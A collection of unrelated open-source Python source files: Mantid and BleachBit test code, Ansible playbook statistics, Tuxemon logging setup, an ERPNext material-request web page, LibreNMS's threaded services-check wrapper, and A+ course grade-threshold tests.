self.assertEqual(bool(mask_options['ActiveType'][1]), True)
self.assertEqual(bool(mask_options['ActiveTools'][2]), True)
def assert_project_files_saved(self, workspace_name):
"""Check files were written to project folder """
file_name = '%s.nxs' % workspace_name
file_path = os.path.join(self._project_folder, file_name)
self.assertTrue(os.path.isdir(self._project_folder))
self.assertTrue(os.path.isfile(self._project_file))
self.assertTrue(os.path.isfile(file_path))
def save_and_reopen_project(self):
"""Save project and clear mantid then reopen the project """
saveProjectAs(self._project_folder)
clear_mantid()
openProject(self._project_file)
def clear_mantid():
"""Clear plots and workspaces from Mantid.
This will also start a new project and remove any previous
project data
"""
# Remove windows and plots
for window in windows():
window.confirmClose(False)
window.close()
QtCore.QCoreApplication.processEvents()
# Clear workspaces
mtd.clear()
# Start a blank project to remove anything else
newProject()
def create_dummy_workspace(ws_name):
""" Create a dummy mantid workspace with some data """
X1 = np.linspace(0, 10, 100)
Y1 = 1000*(np.sin(X1)**2) + X1*10
X1 = np.append(X1, 10.1)
X2 = np.linspace(2, 12, 100)
Y2 = 500*(np.cos(X2/2.)**2) + 20
X2 = np.append(X2, 12.10)
X = np.append(X1, X2)
Y = np.append(Y1, Y2)
E = np.sqrt(Y)
CreateWorkspace(OutputWorkspace=ws_name, DataX=list(X),
DataY=list(Y), DataE=list(E), NSpec=2,
UnitX="TOF", YUnitLabel="Counts",
WorkspaceTitle="Faked data Workspace")
def remove_folder(folder_name):
""" Remove a project folder after a test """
if not os.path.isdir(folder_name):
raise IOError('Path is not a directory')
try:
shutil.rmtree(folder_name)
except:
raise IOError('Could not clean up folder after test')
def get_project_file_contents(folder_name):
""" Get the contents of a Mantid project file given the folder """
if not os.path.isdir(folder_name):
raise IOError('Path is not a directory')
project_name = os.path.basename(folder_name) + '.mantid'
project_file = os.path.join(folder_name, project_name)
with open(project_file, 'r') as file_handle:
contents = file_handle.read()
return contents
def parse_project_file(contents, pattern=""):
""" Create a dictionary of the Mantid project file entries """
if pattern == "":
pattern_str = "<(?P<tag>[a-zA-Z]*)>(.*)</(?P=tag)>"
pattern = re.compile(pattern_str, flags=re.MULTILINE | re.DOTALL)
match = re.findall(pattern, contents)
contents = re.sub(pattern, '', contents)
data = {}
# recursively parse sections
if len(match) > 0:
data = {}
for x, y in match:
data[x] = y
for key in data.keys():
data[key] = parse_project_file(data[key], pattern)
# parse individual property lines
lines = contents.strip().split('\n')
for line in lines:
properties = line.strip().split('\t')
key = properties[0]
values = properties[1:]
if key in data.keys():
# if it already exists then add multiple entries as a dictionary
# with numberical keys corresponding to the order added
if not isinstance(data[key], dict):
data[key] = {0: data[key]}
data[key][max(data[key])+1] = values
elif len(properties) == 2:
data[key] = values[0]
else:
data[key] = values
return data
def read_project_file(folder_name):
""" Read and parse a Mantid project file """
contents = get_project_file_contents(folder_name)
return parse_project_file(contents)
# Run the unit tests
mantidplottests.runTests(MantidPlotProjectSerialiseTest)
| dymkowsk/mantid | MantidPlot/test/MantidPlotProjectSerialiseTest.py | Python | gpl-3.0 | 15,205 |
# vim: ts=4:sw=4:expandtab
# BleachBit
# Copyright (C) 2008-2015 Andrew Ziem
# http://bleachbit.sourceforge.net
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Test cases for module Winapp
"""
import os
import shutil
import sys
import unittest
sys.path.append('.')
from bleachbit.Winapp import Winapp, detectos, detect_file, section2option
from bleachbit.Windows import detect_registry_key
import common
if 'nt' == os.name:
import _winreg
else:
def fake_detect_registry_key(f):
return True
import bleachbit.Windows
bleachbit.Windows.detect_registry_key = fake_detect_registry_key
def get_winapp2():
"""Download and cache winapp2.ini. Return local filename."""
url = "http://www.winapp2.com/Winapp2.ini"
tmpdir = None
if 'posix' == os.name:
tmpdir = '/tmp'
if 'nt' == os.name:
tmpdir = os.getenv('TMP')
fn = os.path.join(tmpdir, 'bleachbit_test_winapp2.ini')
if os.path.exists(fn):
import time
import stat
age_seconds = time.time() - os.stat(fn)[stat.ST_MTIME]
if age_seconds > (24 * 36 * 36):
print 'note: deleting stale file %s ' % fn
os.remove(fn)
if not os.path.exists(fn):
f = file(fn, 'w')
import urllib2
txt = urllib2.urlopen(url).read()
f.write(txt)
return fn
class WinappTestCase(unittest.TestCase):
"""Test cases for Winapp"""
def run_all(self, cleaner, really_delete):
"""Test all the cleaner options"""
for (option_id, __name) in cleaner.get_options():
for cmd in cleaner.get_commands(option_id):
for result in cmd.execute(really_delete):
common.validate_result(self, result, really_delete)
def test_remote(self):
"""Test with downloaded file"""
winapps = Winapp(get_winapp2())
for cleaner in winapps.get_cleaners():
self.run_all(cleaner, False)
def test_detectos(self):
"""Test detectos function"""
# Tests are in the format (required_ver, mock, expected_return)
tests = (('5.1', '5.1', True),
('5.1', '6.0', False),
('6.0', '5.1', False),
('|5.1', '5.1', True),
('|5.1', '6.0', False),
('6.1|', '5.1', False),
('6.1|', '6.0', False),
('6.1|', '6.1', True),
('6.1|', '6.2', True),
('6.2|', '5.1', False),
('6.2|', '6.0', False),
('6.2|', '6.1', False),
('6.2|', '6.2', True))
for (s, mock, expected_return) in tests:
actual_return = detectos(s, mock)
self.assertEqual(expected_return, actual_return,
'detectos(%s, %s)==%s instead of %s' % (s, mock,
actual_return, expected_return))
def test_detect_file(self):
"""Test detect_file function"""
tests = [('%windir%\\system32\\kernel32.dll', True),
('%windir%\\system32', True),
('%ProgramFiles%\\Internet Explorer', True),
('%ProgramFiles%\\Internet Explorer\\', True),
('%windir%\\doesnotexist', False),
('%windir%\\system*', True),
('%windir%\\*ystem32', True),
('%windir%\\*ystem3*', True)]
# On 64-bit Windows, Winapp2.ini expands the %ProgramFiles% environment
# variable to also %ProgramW6432%, so test unique entries in
# %ProgramW6432%.
import struct
if not 32 == 8 * struct.calcsize('P'):
raise NotImplementedError('expecting 32-bit Python')
if os.getenv('ProgramW6432'):
dir_64 = os.listdir(os.getenv('ProgramFiles'))
dir_32 = os.listdir(os.getenv('ProgramW6432'))
dir_32_unique = set(dir_32) - set(dir_64)
if dir_32 and not dir_32_unique:
raise RuntimeError(
'Test expects objects in %ProgramW6432% not in %ProgramFiles%')
for pathname in dir_32_unique:
tests.append(('%%ProgramFiles%%\\%s' % pathname, True))
else:
print 'NOTE: skipping %ProgramW6432% tests because WoW64 not detected'
for (pathname, expected_return) in tests:
actual_return = detect_file(pathname)
msg = 'detect_file(%s) returned %s' % (pathname, actual_return)
self.assertEqual(expected_return, actual_return, msg)
def test_fake(self):
"""Test with fake file"""
ini_fn = None
keyfull = 'HKCU\\Software\\BleachBit\\DeleteThisKey'
subkey = 'Software\\BleachBit\\DeleteThisKey\\AndThisKey'
def setup_fake(f1_filename=None):
"""Setup the test environment"""
dirname = tempfile.mkdtemp(prefix='bleachbit-test-winapp')
f1 = os.path.join(dirname, f1_filename or 'deleteme.log')
file(f1, 'w').write('')
dirname2 = os.path.join(dirname, 'sub')
os.mkdir(dirname2)
f2 = os.path.join(dirname2, 'deleteme.log')
file(f2, 'w').write('')
fbak = os.path.join(dirname, 'deleteme.bak')
file(fbak, 'w').write('')
self.assertTrue(os.path.exists(f1))
self.assertTrue(os.path.exists(f2))
self.assertTrue(os.path.exists(fbak))
hkey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, subkey)
hkey.Close()
self.assertTrue(detect_registry_key(keyfull))
self.assertTrue(detect_registry_key('HKCU\\%s' % subkey))
return (dirname, f1, f2, fbak)
def ini2cleaner(filekey, do_next=True):
ini = file(ini_fn, 'w')
ini.write('[someapp]\n')
ini.write('LangSecRef=3021\n')
ini.write(filekey)
ini.write('\n')
ini.close()
self.assertTrue(os.path.exists(ini_fn))
if do_next:
return Winapp(ini_fn).get_cleaners().next()
else:
return Winapp(ini_fn).get_cleaners()
# reuse this path to store a winapp2.ini file in
import tempfile
(ini_h, ini_fn) = tempfile.mkstemp(suffix='.ini', prefix='winapp2')
os.close(ini_h)
# a set of tests
tests = [
# single file
('FileKey1=%s|deleteme.log', None,
False, True, False, True, True, True),
# special characters for XML
('FileKey1=%s|special_chars_&-\'.txt', 'special_chars_&-\'.txt',
False, True, False, True, True, True),
# *.log
('FileKey1=%s|*.LOG', None, False, True, False, True, True, True),
# semicolon separates different file types
('FileKey1=%s|*.log;*.bak', None,
False, True, False, True, False, True),
# *.*
('FileKey1=%s|*.*', None, False, True, False, True, False, True),
# recurse *.*
('FileKey1=%s|*.*|RECURSE', None, False,
True, False, False, False, True),
# remove self *.*, this removes the directory
('FileKey1=%s|*.*|REMOVESELF', None,
False, False, False, False, False, True),
]
# Add positive detection, where the detection believes the application is present,
# to all the tests, which are also positive.
new_tests = []
for test in tests:
for detect in (
"\nDetectFile=%%APPDATA%%\\Microsoft",
"\nDetectFile1=%%APPDATA%%\\Microsoft\nDetectFile2=%%APPDATA%%\\does_not_exist",
"\nDetectFile1=%%APPDATA%%\\does_not_exist\nDetectFile2=%%APPDATA%%\\Microsoft",
"\nDetect=HKCU\\Software\\Microsoft",
"\nDetect1=HKCU\\Software\\Microsoft\nDetect2=HKCU\\Software\\does_not_exist",
"\nDetect1=HKCU\\Software\\does_not_exist\nDetect2=HKCU\\Software\\Microsoft"):
new_ini = test[0] + detect
new_test = [new_ini, ] + [x for x in test[1:]]
new_tests.append(new_test)
positive_tests = tests + new_tests
# execute positive tests
for test in positive_tests:
print 'positive test: ', test
(dirname, f1, f2, fbak) = setup_fake(test[1])
cleaner = ini2cleaner(test[0] % dirname)
self.assertEqual(test[2], cleaner.auto_hide())
self.run_all(cleaner, False)
self.run_all(cleaner, True)
self.assertEqual(test[3], os.path.exists(dirname))
self.assertEqual(test[4], os.path.exists(f1))
self.assertEqual(test[5], os.path.exists(f2))
self.assertEqual(test[6], os.path.exists(fbak))
self.assertEqual(test[7], cleaner.auto_hide())
shutil.rmtree(dirname, True)
# negative tests where the application detect believes the application
# is absent
for test in tests:
for detect in (
"\nDetectFile=c:\\does_not_exist",
# special characters for XML
"\nDetectFile=c:\\does_not_exist_special_chars_&'",
"\nDetectFile1=c:\\does_not_exist1\nDetectFile2=c:\\does_not_exist2",
"\nDetect=HKCU\\Software\\does_not_exist",
"\nDetect=HKCU\\Software\\does_not_exist_&'",
"\nDetect1=HKCU\\Software\\does_not_exist1\nDetect2=HKCU\\Software\\does_not_exist1"):
new_ini = test[0] + detect
t = [new_ini, ] + [x for x in test[1:]]
print 'negative test', t
# execute the test
(dirname, f1, f2, fbak) = setup_fake()
cleaner = ini2cleaner(t[0] % dirname, False)
self.assertRaises(StopIteration, cleaner.next)
# registry key, basic
(dirname, f1, f2, fbak) = setup_fake()
cleaner = ini2cleaner('RegKey1=%s' % keyfull)
self.run_all(cleaner, False)
self.assertTrue(detect_registry_key(keyfull))
self.run_all(cleaner, True)
self.assertFalse(detect_registry_key(keyfull))
# check for parse error with ampersand
(dirname, f1, f2, fbak) = setup_fake()
cleaner = ini2cleaner('RegKey1=HKCU\\Software\\PeanutButter&Jelly')
self.run_all(cleaner, False)
self.run_all(cleaner, True)
def test_section2option(self):
"""Test for section2option()"""
tests = ((' FOO2 ', 'foo2'),
('A - B (C)', 'a_b_c'))
for test in tests:
self.assertEqual(section2option(test[0]), test[1])
def suite():
return unittest.makeSuite(WinappTestCase)
if __name__ == '__main__':
unittest.main()
| uudiin/bleachbit | tests/TestWinapp.py | Python | gpl-3.0 | 11,482 |
# (c) 2012-2014, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.utils.vars import merge_hash
class AggregateStats:
''' holds stats about per-host activity during playbook runs '''
def __init__(self):
self.processed = {}
self.failures = {}
self.ok = {}
self.dark = {}
self.changed = {}
self.skipped = {}
# user defined stats, which can be per host or global
self.custom = {}
def increment(self, what, host):
''' helper function to bump a statistic '''
self.processed[host] = 1
prev = (getattr(self, what)).get(host, 0)
getattr(self, what)[host] = prev+1
def summarize(self, host):
''' return information about a particular host '''
return dict(
ok = self.ok.get(host, 0),
failures = self.failures.get(host, 0),
unreachable = self.dark.get(host,0),
changed = self.changed.get(host, 0),
skipped = self.skipped.get(host, 0)
)
def set_custom_stats(self, which, what, host=None):
''' allow setting of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom:
self.custom[host] = {which: what}
else:
self.custom[host][which] = what
def update_custom_stats(self, which, what, host=None):
''' allow aggregation of a custom stat'''
if host is None:
host = '_run'
if host not in self.custom or which not in self.custom[host]:
return self.set_custom_stats(which, what, host)
# mismatching types
if type(what) != type(self.custom[host][which]):
return None
if isinstance(what, dict):
self.custom[host][which] = merge_hash(self.custom[host][which], what)
else:
# let overloaded + take care of other types
self.custom[host][which] += what
| alvaroaleman/ansible | lib/ansible/executor/stats.py | Python | gpl-3.0 | 2,779 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Tuxemon
# Copyright (C) 2014, William Edwards <[email protected]>,
# Benjamin Bean <[email protected]>
#
# This file is part of Tuxemon.
#
# Tuxemon is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Tuxemon is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Tuxemon. If not, see <http://www.gnu.org/licenses/>.
#
# Contributor(s):
#
# William Edwards <[email protected]>
#
#
# core.components.log Logging module.
#
#
import sys
import logging
from . import config as Config
# read the configuration file
config = Config.Config()
loggers = {}
# Set up logging if the configuration has it enabled
if config.debug_logging == "1":
for logger_name in config.loggers:
# Enable logging
logger = logging.getLogger(logger_name)
logger.setLevel(int(config.debug_level))
log_hdlr = logging.StreamHandler(sys.stdout)
log_hdlr.setLevel(logging.DEBUG)
log_hdlr.setFormatter(logging.Formatter("%(asctime)s - %(name)s - "
"%(levelname)s - %(message)s"))
logger.addHandler(log_hdlr)
loggers[logger_name] = logger
| andrefbsantos/Tuxemon | tuxemon/core/components/log.py | Python | gpl-3.0 | 1,644 |
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
import frappe
from frappe import _
from frappe.utils import flt
def get_context(context):
context.no_cache = 1
context.show_sidebar = True
context.doc = frappe.get_doc(frappe.form_dict.doctype, frappe.form_dict.name)
if hasattr(context.doc, "set_indicator"):
context.doc.set_indicator()
context.parents = frappe.form_dict.parents
context.title = frappe.form_dict.name
if not frappe.has_website_permission(context.doc):
frappe.throw(_("Not Permitted"), frappe.PermissionError)
default_print_format = frappe.db.get_value('Property Setter', dict(property='default_print_format', doc_type=frappe.form_dict.doctype), "value")
if default_print_format:
context.print_format = default_print_format
else:
context.print_format = "Standard"
context.doc.items = get_more_items_info(context.doc.items, context.doc.name)
def get_more_items_info(items, material_request):
for item in items:
item.customer_provided = frappe.get_value('Item', item.item_code, 'is_customer_provided_item')
item.work_orders = frappe.db.sql("""
select
wo.name, wo.status, wo_item.consumed_qty
from
`tabWork Order Item` wo_item, `tabWork Order` wo
where
wo_item.item_code=%s
and wo_item.consumed_qty=0
and wo_item.parent=wo.name
and wo.status not in ('Completed', 'Cancelled', 'Stopped')
order by
wo.name asc""", item.item_code, as_dict=1)
item.delivered_qty = flt(frappe.db.sql("""select sum(transfer_qty)
from `tabStock Entry Detail` where material_request = %s
and item_code = %s and docstatus = 1""",
(material_request, item.item_code))[0][0])
return items
| mhbu50/erpnext | erpnext/templates/pages/material_request_info.py | Python | gpl-3.0 | 1,743 |
#! /usr/bin/env python3
"""
services-wrapper A small tool which wraps around check-services.php and tries to
guide the services process with a more modern approach with a
Queue and workers.
Based on the original version of poller-wrapper.py by Job Snijders
Author: Neil Lathwood <[email protected]>
Orsiris de Jong <[email protected]>
Date: Oct 2019
Usage: This program accepts one command line argument: the number of threads
that should run simultaneously. If no argument is given it will assume
a default of 1 thread.
Ubuntu Linux: apt-get install python-mysqldb
FreeBSD: cd /usr/ports/*/py-MySQLdb && make install clean
RHEL 7: yum install MySQL-python
RHEL 8: dnf install mariadb-connector-c-devel gcc && python -m pip install mysqlclient
Tested on: Python 3.6.8 / PHP 7.2.11 / CentOS 8
License: This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
Public License for more details.
You should have received a copy of the GNU General Public License along
with this program. If not, see https://www.gnu.org/licenses/.
LICENSE.txt contains a copy of the full GPLv3 licensing conditions.
"""
import LibreNMS.library as LNMS
try:
import json
import os
import queue
import subprocess
import sys
import threading
import time
from optparse import OptionParser
except ImportError as exc:
print("ERROR: missing one or more of the following python modules:")
print("threading, queue, sys, subprocess, time, os, json")
print("ERROR: %s" % exc)
sys.exit(2)
APP_NAME = "services_wrapper"
LOG_FILE = "logs/" + APP_NAME + ".log"
_DEBUG = False
servicedisco = False
real_duration = 0
service_devices = 0
"""
Threading helper functions
"""
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC0
def memc_alive():
try:
global memc
key = str(uuid.uuid4())
memc.set("poller.ping." + key, key, 60)
if memc.get("poller.ping." + key) == key:
memc.delete("poller.ping." + key)
return True
else:
return False
except:
return False
def memc_touch(key, time):
try:
global memc
val = memc.get(key)
memc.set(key, val, time)
except:
pass
def get_time_tag(step):
ts = int(time.time())
return ts - ts % step
# EOC0
"""
A seperate queue and a single worker for printing information to the screen prevents
the good old joke:
Some people, when confronted with a problem, think,
"I know, I'll use threads," and then they two they hav erpoblesms.
"""
def printworker():
nodeso = 0
while True:
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC4
global IsNode
global servicedisco
if servicedisco:
if not IsNode:
memc_touch("service.master", 10)
nodes = memc.get("service.nodes")
if nodes is None and not memc_alive():
print(
"WARNING: Lost Memcached. Taking over all devices. Nodes will quit shortly."
)
servicedisco = False
nodes = nodeso
if nodes is not nodeso:
print("INFO: %s Node(s) Total" % (nodes))
nodeso = nodes
else:
memc_touch("service.nodes", 10)
try:
worker_id, device_id, elapsed_time = print_queue.get(False)
except:
pass
try:
time.sleep(1)
except:
pass
continue
else:
worker_id, device_id, elapsed_time = print_queue.get()
# EOC4
global real_duration
global per_device_duration
global service_devices
real_duration += elapsed_time
per_device_duration[device_id] = elapsed_time
service_devices += 1
if elapsed_time < 300:
print(
"INFO: worker %s finished device %s in %s seconds"
% (worker_id, device_id, elapsed_time)
)
else:
print(
"WARNING: worker %s finished device %s in %s seconds"
% (worker_id, device_id, elapsed_time)
)
print_queue.task_done()
"""
This class will fork off single instances of the check-services.php process, record
how long it takes, and push the resulting reports to the printer queue
"""
def poll_worker():
while True:
device_id = poll_queue.get()
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC5
if not servicedisco or memc.get("service.device." + str(device_id)) is None:
if servicedisco:
result = memc.add(
"service.device." + str(device_id),
config["distributed_poller_name"],
300,
)
if not result:
print(
"This device (%s) appears to be being service checked by another service node"
% (device_id)
)
poll_queue.task_done()
continue
if not memc_alive() and IsNode:
print(
"Lost Memcached, Not service checking Device %s as Node. Master will check it."
% device_id
)
poll_queue.task_done()
continue
# EOC5
try:
start_time = time.time()
output = (
"-d >> %s/services_device_%s.log" % (log_dir, device_id)
if debug
else ">> /dev/null"
)
# TODO replace with command_runner
command = "/usr/bin/env php %s -h %s %s 2>&1" % (
service_path,
device_id,
output,
)
subprocess.check_call(command, shell=True)
elapsed_time = int(time.time() - start_time)
print_queue.put(
[threading.current_thread().name, device_id, elapsed_time]
)
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
poll_queue.task_done()
if __name__ == "__main__":
logger = LNMS.logger_get_logger(LOG_FILE, debug=_DEBUG)
install_dir = os.path.dirname(os.path.realpath(__file__))
LNMS.check_for_file(install_dir + "/.env")
config = json.loads(LNMS.get_config_data(install_dir))
service_path = config["install_dir"] + "/check-services.php"
log_dir = config["log_dir"]
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC1
if "distributed_poller_group" in config:
service_group = str(config["distributed_poller_group"])
else:
service_group = False
if (
"distributed_poller" in config
and "distributed_poller_memcached_host" in config
and "distributed_poller_memcached_port" in config
and config["distributed_poller"]
):
try:
import memcache
import uuid
memc = memcache.Client(
[
config["distributed_poller_memcached_host"]
+ ":"
+ str(config["distributed_poller_memcached_port"])
]
)
if str(memc.get("service.master")) == config["distributed_poller_name"]:
print("This system is already joined as the service master.")
sys.exit(2)
if memc_alive():
if memc.get("service.master") is None:
print("Registered as Master")
memc.set("service.master", config["distributed_poller_name"], 10)
memc.set("service.nodes", 0, 300)
IsNode = False
else:
print(
"Registered as Node joining Master %s"
% memc.get("service.master")
)
IsNode = True
memc.incr("service.nodes")
servicedisco = True
else:
print(
"Could not connect to memcached, disabling distributed service checks."
)
servicedisco = False
IsNode = False
except SystemExit:
raise
except ImportError:
print("ERROR: missing memcache python module:")
print("On deb systems: apt-get install python3-memcache")
print("On other systems: pip3 install python-memcached")
print("Disabling distributed discovery.")
servicedisco = False
else:
servicedisco = False
# EOC1
s_time = time.time()
real_duration = 0
per_device_duration = {}
service_devices = 0
"""
Take the amount of threads we want to run in parallel from the commandline
if None are given or the argument was garbage, fall back to default of 16
"""
usage = "usage: %prog [options] <workers> (Default: 1 (Do not set too high)"
description = "Spawn multiple check-services.php processes in parallel."
parser = OptionParser(usage=usage, description=description)
parser.add_option(
"-d",
"--debug",
action="store_true",
default=False,
help="Enable debug output. WARNING: Leaving this enabled will consume a lot of disk space.",
)
(options, args) = parser.parse_args()
debug = options.debug
try:
amount_of_workers = int(args[0])
except (IndexError, ValueError):
amount_of_workers = 1
devices_list = []
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC2
if service_group is not False:
query = (
"SELECT DISTINCT(`services`.`device_id`) FROM `services` LEFT JOIN `devices` ON `services`.`device_id` = `devices`.`device_id` WHERE `devices`.`poller_group` IN("
+ service_group
+ ") AND `devices`.`disabled` = 0"
)
else:
query = "SELECT DISTINCT(`services`.`device_id`) FROM `services` LEFT JOIN `devices` ON `services`.`device_id` = `devices`.`device_id` WHERE `devices`.`disabled` = 0"
# EOC2
db = LNMS.db_open(
config["db_socket"],
config["db_host"],
config["db_port"],
config["db_user"],
config["db_pass"],
config["db_name"],
)
cursor = db.cursor()
cursor.execute(query)
devices = cursor.fetchall()
for row in devices:
devices_list.append(int(row[0]))
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC3
if servicedisco and not IsNode:
query = "SELECT MAX(`device_id`), MIN(`device_id`) FROM `services`"
cursor.execute(query)
devices = cursor.fetchall()
maxlocks = devices[0][0] or 0
minlocks = devices[0][1] or 0
# EOC3
db.close()
poll_queue = queue.Queue()
print_queue = queue.Queue()
print(
"INFO: starting the service check at %s with %s threads"
% (time.strftime("%Y-%m-%d %H:%M:%S"), amount_of_workers)
)
for device_id in devices_list:
poll_queue.put(device_id)
for i in range(amount_of_workers):
t = threading.Thread(target=poll_worker)
t.setDaemon(True)
t.start()
p = threading.Thread(target=printworker)
p.setDaemon(True)
p.start()
try:
poll_queue.join()
print_queue.join()
except (KeyboardInterrupt, SystemExit):
raise
total_time = int(time.time() - s_time)
print(
"INFO: services-wrapper checked %s devices in %s seconds with %s workers"
% (service_devices, total_time, amount_of_workers)
)
# (c) 2015, GPLv3, Daniel Preussker <[email protected]> <<<EOC6
if servicedisco or memc_alive():
master = memc.get("service.master")
if master == config["distributed_poller_name"] and not IsNode:
print("Wait for all service-nodes to finish")
nodes = memc.get("service.nodes")
while nodes is not None and nodes > 0:
try:
time.sleep(1)
nodes = memc.get("service.nodes")
except:
pass
print("Clearing Locks")
x = minlocks
while x <= maxlocks:
memc.delete("service.device." + str(x))
x = x + 1
print("%s Locks Cleared" % x)
print("Clearing Nodes")
memc.delete("service.master")
memc.delete("service.nodes")
else:
memc.decr("service.nodes")
print("Finished %s." % time.time())
# EOC6
show_stopper = False
if total_time > 300:
print(
"WARNING: the process took more than 5 minutes to finish, you need faster hardware or more threads"
)
print(
"INFO: in sequential style service checks the elapsed time would have been: %s seconds"
% real_duration
)
for device in per_device_duration:
if per_device_duration[device] > 300:
print(
"WARNING: device %s is taking too long: %s seconds"
% (device, per_device_duration[device])
)
show_stopper = True
if show_stopper:
print(
"ERROR: Some devices are taking more than 300 seconds, the script cannot recommend you what to do."
)
else:
recommend = int(total_time / 300.0 * amount_of_workers + 1)
print(
"WARNING: Consider setting a minimum of %d threads. (This does not constitute professional advice!)"
% recommend
)
sys.exit(2)
| rasssta/librenms | services-wrapper.py | Python | gpl-3.0 | 14,784 |
from lib.testdata import CourseTestCase
from exercise.cache.content import CachedContent
from exercise.cache.points import CachedPoints
from .models import Threshold
class ThresholdTest(CourseTestCase):
class MockCachedPoints:
def __init__(self, total_data):
self.data = total_data
def total(self):
return self.data
GRADE_0 = MockCachedPoints({
'points':8,
'points_by_difficulty':{'A':1500,'B':200},
'unconfirmed_points_by_difficulty':{'A':200,'B':200},
})
GRADE_1 = MockCachedPoints({
'points':10,
'points_by_difficulty':{'A':1800}
})
GRADE_2 = MockCachedPoints({
'points':25,
'points_by_difficulty':{'A':1900,'B':500}
})
GRADE_3 = MockCachedPoints({
'points':39,
'points_by_difficulty':{'A':1900,'B':875,'C':349}
})
GRADE_4 = MockCachedPoints({
'points':48,
'points_by_difficulty':{'A':1800,'B':775,'C':550}
})
GRADE_5 = MockCachedPoints({
'points':100,
'points_by_difficulty':{'A':1700,'B':0,'C':1775}
})
def setUp(self):
self.setUpCourse()
self.setUpSubmissions()
self.grades = list([
Threshold.objects.create(course_instance=self.instance, name=name)
for name in ["1", "2", "3", "4", "5"]
])
def _create_difficulty_thresholds(self):
self.grades[0].points.create(limit=1800, difficulty="A", order=1)
self.grades[0].points.create(limit=0, difficulty="B", order=2)
self.grades[0].points.create(limit=0, difficulty="C", order=3)
self.grades[1].points.create(limit=1900, difficulty="A", order=1)
self.grades[1].points.create(limit=400, difficulty="B", order=2)
self.grades[1].points.create(limit=0, difficulty="C", order=3)
self.grades[2].points.create(limit=1900, difficulty="A", order=1)
self.grades[2].points.create(limit=875, difficulty="B", order=2)
self.grades[2].points.create(limit=0, difficulty="C", order=3)
self.grades[3].points.create(limit=1900, difficulty="A", order=1)
self.grades[3].points.create(limit=875, difficulty="B", order=2)
self.grades[3].points.create(limit=350, difficulty="C", order=3)
self.grades[4].points.create(limit=1900, difficulty="A", order=1)
self.grades[4].points.create(limit=875, difficulty="B", order=2)
self.grades[4].points.create(limit=600, difficulty="C", order=3)
def test_normal_points(self):
self.grades[0].points.create(limit=10)
self.grades[1].points.create(limit=20)
self.grades[2].points.create(limit=30)
self.grades[3].points.create(limit=40)
self.grades[4].points.create(limit=50)
self.grades[3].consume_harder_points = True
self.grades[3].save()
self.assertFalse(self.grades[0].is_passed(self.GRADE_0))
self.assertFalse(self.grades[4].is_passed(self.GRADE_0))
self.assertTrue(self.grades[0].is_passed(self.GRADE_1))
self.assertFalse(self.grades[1].is_passed(self.GRADE_1))
self.assertTrue(self.grades[0].is_passed(self.GRADE_2))
self.assertTrue(self.grades[1].is_passed(self.GRADE_2))
self.assertFalse(self.grades[2].is_passed(self.GRADE_2))
self.assertTrue(self.grades[2].is_passed(self.GRADE_3))
self.assertFalse(self.grades[3].is_passed(self.GRADE_3))
self.assertTrue(self.grades[3].is_passed(self.GRADE_4))
self.assertFalse(self.grades[4].is_passed(self.GRADE_4))
self.assertTrue(self.grades[4].is_passed(self.GRADE_5))
self.assertTrue(self.grades[3].is_passed(self.GRADE_5))
def test_difficulty_points(self):
self._create_difficulty_thresholds()
self.assertFalse(self.grades[0].is_passed(self.GRADE_0))
self.assertFalse(self.grades[4].is_passed(self.GRADE_0))
self.assertTrue(self.grades[0].is_passed(self.GRADE_1))
self.assertFalse(self.grades[1].is_passed(self.GRADE_1))
self.assertTrue(self.grades[0].is_passed(self.GRADE_2))
self.assertTrue(self.grades[1].is_passed(self.GRADE_2))
self.assertFalse(self.grades[2].is_passed(self.GRADE_2))
self.assertTrue(self.grades[2].is_passed(self.GRADE_3))
self.assertFalse(self.grades[3].is_passed(self.GRADE_3))
self.assertTrue(self.grades[0].is_passed(self.GRADE_4))
self.assertFalse(self.grades[1].is_passed(self.GRADE_4))
self.assertFalse(self.grades[2].is_passed(self.GRADE_4))
self.assertFalse(self.grades[3].is_passed(self.GRADE_4))
self.assertFalse(self.grades[4].is_passed(self.GRADE_4))
self.assertFalse(self.grades[0].is_passed(self.GRADE_5))
self.assertFalse(self.grades[1].is_passed(self.GRADE_5))
self.assertFalse(self.grades[2].is_passed(self.GRADE_5))
self.assertFalse(self.grades[3].is_passed(self.GRADE_5))
